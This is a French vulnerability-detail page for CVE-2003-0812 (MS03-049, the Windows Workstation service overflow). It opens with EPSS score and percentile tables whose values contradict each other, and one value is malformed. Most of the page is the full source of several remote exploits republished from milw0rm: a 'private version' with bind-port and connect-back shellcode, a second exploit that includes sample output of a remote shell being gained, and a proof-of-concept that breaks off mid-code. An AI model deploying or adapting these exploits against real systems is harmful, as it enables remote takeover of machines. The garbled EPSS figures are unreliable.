CVE-2003-0812 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	91.86%	–	–
2023-03-12	–	–	–	96.75%	–
2023-05-28	–	–	–	96.96%	–
2024-04-28	–	–	–	96.9%	–
2024-06-02	–	–	–	96.9%	–
2024-09-15	–	–	–	96.86%	–
2024-12-22	–	–	–	95.82%	–
2025-01-19	–	–	–	95.82%	–
2025-03-18	–	–	–	–	84.71%
2025-03-30	–	–	–	–	85.32%
2025-03-30	–	–	–	–	85.32,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-05-28	1%
2024-04-28	1%
2024-06-02	1%
2024-09-15	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

/* * Author: snooq * Date: 14 November 2003 * * +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++ * * This is just slightly better than the one I posted to * packetstorm.... * * The public version will crash 'services.exe' immediately * while this one crash it only when u exit from shell.... * * I'm still trying to figure out a way to avoid the 'crash' * all together... any ideas???? * * Let me know if you hav trouble compiling this shit... * I hope this could be a good e.g for u to try Win32 * exploitation.. * * This code is crappy... if u know of a better way of doing * things... pls tell me....... * * Otherwise, if you guys r keen... I'll be more than happy * to go thru this in details wif u all... Meanwhile..enjoy! * * +++++++++++++++++++++++++++++++++++++++++++++++++ */ #pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib") #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib") #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib") #pragma comment (linker,"/NODEFAULTLIB:libcd.lib") #pragma comment (lib,"ws2_32") #pragma comment (lib,"msvcrt") #pragma comment (lib,"mpr") #pragma warning (disable:4013) #include <winsock2.h> #include <windows.h> #include <process.h> #include <stdlib.h> #include <stdio.h> #include <lm.h> #define NOP 0x90 #define PORT 24876 #define KEY 0x99999999 #define ALIGN 1 // Between 0 ~ 3 #define TARGET 1 #define INTERVAL 3 #define TIME_OUT 20 #define PORT_OFFSET_1 198 #define PORT_OFFSET_2 193 #define IP_OFFSET 186 #define SC_OFFSET 20 // Gap for some NOPs... #define RET_SIZE 2026 // Big enuff to take EIP... ;) #define SC_SIZE_1 sizeof(bindport) #define SC_SIZE_2 sizeof(connback) #define BSIZE 2600 #define SSIZE 128 extern char getopt(int,char **,char*); extern char *optarg; static int alarm_fired=0; HMODULE hMod; FARPROC fxn; HANDLE t1, t2; char buff[BSIZE]; struct { char *os; long jmpesp; char *dll; } targets[] = { { "Window 2000 (en) SP4", 0x77e14c29, "user32.dll 5.0.2195.6688" }, { "Window 2000 (en) SP1", 0x77e3cb4c, "user32.dll 5.0.2195.1600" }, { "For debugging only", 0x41424344, "dummy.dll 5.0.2195.1600" } }, v; /* * HD Moore's shellcode..... ;) */ char bindport[]= "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99" "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f" "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65" "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a" "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10" "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85" "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0" "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f" "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17" "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66" "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8" "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc" "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18" "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f" "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5" "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0" "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66" "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce" "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81" "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65" "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5" "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85" "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4" "\xc2\x5b\x91\x99"; char connback[]= "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99" "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33" "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b" "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7" "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd" "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce" "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3" "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71" "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09" "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce" "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b" "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd" "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67" "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14" "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99" "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd" "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12" "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72" "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79" "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12" "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12" "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09"; void err_exit(char *s) { printf("%s\n",s); exit(0); } /* * Ripped from TESO code and modifed by ey4s for win32 * and... lamer quoted it wholesale here..... =p */ void doshell(int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec=1; time.tv_usec=0; while (1) { ul[0]=1; ul[1]=sock; l=select(0,(fd_set *)&ul,NULL,NULL,&time); if(l==1) { l=recv(sock,buf,sizeof(buf),0); if (l<=0) { err_exit("-> Connection closed...\n"); } l=write(1,buf,l); if (l<=0) { err_exit("-> Connection closed...\n"); } } else { l=read(0,buf,sizeof(buf)); if (l<=0) { err_exit("-> Connection closed...\n"); } l=send(sock,buf,l,0); if (l<=0) { err_exit("-> Connection closed...\n"); } } } } void changeip(char *ip) { char *ptr; ptr=connback+IP_OFFSET; /* Assume Little-Endianess.... */ *((long *)ptr)=inet_addr(ip)^KEY; } void changeport(char *code, int port, int offset) { char *ptr; ptr=code+offset; port^=KEY; /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); } void banner() { printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n"); } void usage(char *s) { banner(); printf("Usage: %s [options]\n",s); printf("\t-r\tSize of 'return addresses'\n"); printf("\t-a\tAlignment size [0~3]\n"); printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n"); printf("\t\tPort for shell to connect back (in 'listening' mode)\n"); printf("\t-s\tShellcode offset from the return address\n"); printf("\t-h\tTarget's IP\n"); printf("\t-t\tTarget types. ( -H for more info )\n"); printf("\t-H\tShow list of possible targets\n"); printf("\t-l\tListening for shell connecting\n"); printf("\t\tback to port specified by '-p' switch\n"); printf("\t-i\tIP for shell to connect back\n"); printf("\t-I\tTime interval between each trial ('connecting' mode only)\n"); printf("\t-T\tTime out (in number of seconds)\n\n"); printf("\tNotes:\n\t======\n\t'-h' is mandatory\n"); printf("\t'-i' is mandatory if '-l' is specified\n\n"); exit(0); } void showtargets() { int i; banner(); printf("Possible targets are:\n"); printf("=====================\n"); for (i=0;i<sizeof(targets)/sizeof(v);i++) { printf("%d) %s",i+1,targets[i].os); printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll); } exit(0); } void sendstr(char *host) { WCHAR wStr[128]; char ipc[128], hStr[128]; DWORD ret; NETRESOURCE NET; hMod=LoadLibrary("netapi32.dll"); fxn=GetProcAddress(hMod,"NetValidateName"); _snprintf(ipc,127,"\\\\%s\\ipc$",host); _snprintf(hStr,127,"\\\\%s",host); MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0])); NET.lpLocalName = NULL; NET.lpProvider = NULL; NET.dwType = RESOURCETYPE_ANY; NET.lpRemoteName = (char*)&ipc; printf("-> Setting up $IPC session...(aka 'null session')\n"); ret=WNetAddConnection2(&NET,"","",0); if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); } else printf("-> IPC$ session setup successfully...\n"); printf("-> Sending exploit string...\n"); ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0); } VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) { err_exit("-> I give up...dude....."); } void setalarm(int timeout) { MSG msg = { 0, 0, 0, 0 }; SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell); while(!alarm_fired) { if (GetMessage(&msg, 0, 0, 0) ) { if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n"); DispatchMessage(&msg); } } } void resetalarm() { if (TerminateThread(t2,0)==0) { err_exit("-> Failed to reset alarm..."); } if (TerminateThread(t1,0)==0) { err_exit("-> Failed to kill the 'sending' thread..."); } } void do_send(char *host,int timeout) { t1=(HANDLE)_beginthread(sendstr,0,host); if (t1==0) { err_exit("-> Failed to send exploit string..."); } t2=(HANDLE)_beginthread(setalarm,0,timeout); if (t2==0) { err_exit("-> Failed to set alarm clock..."); } } int main(int argc, char *argv[]) { char opt; char *host, *ptr, *ip=""; struct sockaddr_in sockadd; int i, i_len, ok=0, mode=0, flag=0; int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET; int target=TARGET, scsize=SC_SIZE_1, port=PORT; int timeout=TIME_OUT, interval=INTERVAL; long retaddr; WSADATA wsd; SOCKET s1, s2; if (argc<2) { usage(argv[0]); } while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) { switch(opt) { case 'a': align=atoi(optarg); break; case 'I': interval=atoi(optarg); break; case 'T': timeout=atoi(optarg); break; case 't': target=atoi(optarg); retaddr=targets[target-1].jmpesp; break; case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'r': retsize=atoi(optarg); break; case 's': sc_offset=atoi(optarg); break; case 'h': ok=1; host=optarg; sockadd.sin_addr.s_addr=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'H': showtargets(); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); } memset(buff,NOP,BSIZE); ptr=buff+align; for(i=0;i<retsize;i+=4) { *((long *)ptr)=retaddr; ptr+=4; } if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) { err_exit("-> WSAStartup error...."); } if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { err_exit("-> socket() error..."); } sockadd.sin_family=AF_INET; sockadd.sin_port=htons((SHORT)port); ptr=buff+retsize+sc_offset; if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'.."); banner(); if (mode) { printf("-> 'Listening' mode...( port: %d )\n",port); changeport(connback, port, PORT_OFFSET_2); for(i=0;i<scsize;i++) { *ptr++=connback[i]; } do_send(host,timeout); Sleep(1000); sockadd.sin_addr.s_addr=htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s1,0)<0) { err_exit("-> listen() error"); } printf("-> Waiting for connection...\n"); s2=accept(s1,(struct sockaddr *)&sockadd,&i_len); if (s2<0) { err_exit("-> accept() error"); } printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr)); resetalarm(); doshell(s2); } else { printf("-> 'Connecting' mode...\n",port); changeport(bindport, port, PORT_OFFSET_1); for(i=0;i<scsize;i++) { *ptr++=bindport[i]; } do_send(host,timeout); Sleep(1000); printf("-> Will try connecting to shell now....\n"); i=0; while(!flag) { Sleep(interval*1000); if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { printf("-> Trial #%d....\n",i++); } else { flag=1; } } printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port); resetalarm(); doshell(s1); } return 0; } // milw0rm.com [2003-11-14]

/* To build new netapi32.lib pedump /exp netapi32.dll > netapi32.exp buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll d:\>rpc_wks_bo.exe WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1 ------------------------------------------------------------------- Usage: rpc_wks_bo.exe [-ht] -h <IP> : Target IP -t <Type> : Target type (-t0 for a list) d:\>rpc_wks_bo.exe -t0 Possible targets are: ============================ 1) Window XP Pro + SP0 [Rus] 2) Window XP Pro + SP1 [Rus] 3) Crash all d:\>rpc_wks_bo.exe -h 192.168.100.7 -t1 [+] Prepare exploit string [+] Sleep at 2s ... [+] Setting up IPC$ session... [+] IPC$ session setup successfully! [+] Sending exploit ... [+] Initialize WSAStartup - OK [+] Socket initialized - OK [+] Try connecting to 192.168.100.7:9191 ... [*] Connected to shell at 192.168.100.7:9191 Microsoft Windows XP [Âåðñèÿ 5.1.2600] (Ñ) Êîðïîðàöèÿ Ìàéêðîñîôò, 1985-2001. C:\WINDOWS\system32> */ /**************** Public version *****************/ #include <stdio.h> #include <io.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <windows.h> #include <process.h> #pragma lib <ws2_32.lib> #pragma lib <netapi32.lib> #pragma lib <mpr.lib> #define RECVTIMEOUT 1 #define VER "0.1.4" extern char getopt(int,char **,char*); extern char *optarg; // ------------------------------------------------ void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount, wchar_t *DomainAccountPassword, unsigned int Reserved); void send_exp(); // ----------Lamers buff =) ---------------------------- char expl[3000]; wchar_t expl_uni[6000]; char tgt_net[30]; wchar_t tgt_net_uni[60]; char ipc[30]; // ----------------------------------------------------- struct { char *os; long jmpesp; } targets[] = { { "Window XP + SP0 [Rus] ", 0x77f5801c }, // 0x77d6754a(user32.dll) { "Window XP + SP0 + Rollup [Rus] ", 0x77f98db7 }, //0x77d639ab-work 0x77fb59cc - sp1 { "Window XP + SP1 [Rus] ", 0x77fb59cc }, { "Window XP + SP1 + Rollup [Rus] ", 0x77f9980f }, // 0x77d637db(user32.dll) { "Crash all ", 0x41424344 } }, tgt_type; unsigned char shellcode[] = // bind shell at 9191 port (484 bytes) // ripped =) "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33" "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C" "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE" "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB" "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77" "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77" "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77" "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77" "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77" "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77" "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77" "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77" "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77" "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB" "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C" "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0" "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77" "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0" "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB" "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5" "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98" "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE" "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77" "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8" "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF" "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90" "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74" "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4" "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94" "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5" "\xD3\x4A\x8C\x88"; /***************************************************************/ void banner() { printf("\nWKS service remote exploit by fiNis (fiNis[at]bk[dot]ru), ver:%s\n",VER); printf( "-------------------------------------------------------------------\n"); } void showtargets() { int i; printf("Possible targets are:\n"); printf("============================\n"); for (i=0;i<sizeof(targets)/sizeof(tgt_type);i++) { printf("%d) %s\n",i+1,targets[i].os); } exit(1); } void usage(char *prog) { banner(); printf("Usage: %s [-ht]\n", prog); printf("\t-h <IP> : Target IP\n"); printf("\t-t <Type> : Target type (-t0 for a list)\n"); exit(1); } /***************************************************************/ long gimmeip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname); WSACleanup(); exit(1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } // ************************************* CMD ***************************** /* * Ripped from TESO code and modifed by ey4s for win32 */ void cmdshell2(int sock) { int l; char buf[1000]; struct timeval time; unsigned long ul[2]; time.tv_sec=RECVTIMEOUT; time.tv_usec=0; while (1) { ul[0]=1; ul[1]=sock; l=select(0,(fd_set *)&ul,NULL,NULL,&time); if(l==1) { l=recv(sock,buf,sizeof(buf),0); if (l<=0) { printf("[x] Connection closed.\n"); return; } l=write(1,buf,l); if (l<=0) { printf("[x] Connection closed.\n"); return; } } else { l=read(0,buf,sizeof(buf)); if (l<=0) { printf("[x] Connection closed.\n"); return; } l=send(sock,buf,l,0); if (l<=0) { printf("[x] Connection closed.\n"); return; } } } } /****************************************************************/ void send_exp() { NETRESOURCE _IPC_; _IPC_.lpLocalName = NULL; _IPC_.lpProvider = NULL; _IPC_.dwType = RESOURCETYPE_ANY; _IPC_.lpRemoteName = (char*)&ipc; printf("[+] Setting up IPC$ session...\n"); if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) { printf("[x] Couldn't establish IPC$ connection.\n"); exit (1); } printf("[*] IPC$ session setup successfully!\n"); printf("[+] Sending exploit ...\n"); NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0); // ka-a-a b0-0-0-ms // } // *************************************************************** int main(int argc,char *argv[]) { WSADATA wsdata; int sock; unsigned short port = 9191; struct sockaddr_in target; unsigned long ip; char opt; int tgt_type = 0; char *tgt_host; if (argc<2) { usage(argv[0]); } while((opt = getopt(argc,argv,"h:t:v"))!=EOF) { switch(opt) { case 'h': tgt_host = optarg; snprintf(tgt_net,127, "\\\\%s", optarg); snprintf(ipc,127, "\\\\%s\\ipc$", optarg); break; case 't': tgt_type = atoi(optarg); if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) { showtargets(); } break; default: usage(argv[0]); break; } } printf("\n[+] Prepare exploit string\n"); memset(expl, 0x00, sizeof(expl)); memset(expl, 0x41, 2064); memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4); //memcpy(&expl[2044], "BBBB", 4); memcpy(&expl[2064], shellcode, sizeof(shellcode)); // begin shellcode here memset(expl_uni, 0x00, sizeof(expl_uni)); memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni)); mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net)); switch(tgt_type) { case 1: case 3: MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni)); // MultiByteToWideChar - 100 % work at XP+SP0+Rollup break; case 2: mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1 break; default: mbstowcs(expl_uni, expl, sizeof(expl)); break; } beginthread(send_exp,0,NULL); printf("[+] Sleep at 2s ... \n"); sleep(2000); if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) { printf("[x] WSAStartup error...\n"); WSACleanup(); return 1; } printf("[+] Initialize WSAStartup - OK\n"); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { printf("[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Socket initialized - OK\n"); ip=gimmeip(tgt_host); memset(&target, 0, sizeof(target)); target.sin_family=AF_INET; target.sin_addr.s_addr = ip; target.sin_port=htons(port); printf("[+] Try connecting to %s:%d ...\n",tgt_host,port); if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) { printf("\n[x] Exploit failed or is Filtred. Exiting...\n"); WSACleanup(); exit(1); } printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port); cmdshell2(sock); closesocket(sock); WSACleanup(); return 0; } // milw0rm.com [2003-12-04]

/* Proof of concept for MS03-049. This code was tested on a Win2K SP4 with FAT32 file system, and is supposed to work *only* with that (it will probably crash the the other 2Ks, no clue about XPs). To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve this public version, do not bother to ask. Credits go to eEye See original bulletin for more information, it is very well documented. */ #include <stdio.h> #include <win.h> #include <string.h> typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG); #define SIZE 2048 // PEX generated port binding shellcode (5555) unsigned char shellcode[] = "\x66\x81\xec\x04\x07" // sub sp, 704h "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31" "\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc" "\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25" "\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b" "\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b" "\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17" "\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25" "\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d" "\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d" "\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76" "\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda" "\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72" "\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d" "\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda" "\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8" "\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61" "\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75" "\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50" "\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70" "\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d" "\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24" "\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d" "\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4" "\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21" "\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25"; unsigned char jmp[] = "\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload int main(void) { int ret; HINSTANCE hInstance; MYPROC procAddress; char szBuffer[SIZE]; NETRESOURCE netResource; netResource.lpLocalName = NULL; netResource.lpProvider = NULL; netResource.dwType = RESOURCETYPE_ANY; netResource.lpRemoteName = "\\\\192.168.175.3\\ipc$"; ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session if (ret != 0) { fprintf(stderr, "[-] WNetAddConnection2 failed\n"); return 1; } hInstance = LoadLibrary("netapi32"); if (hInstance == NULL) { 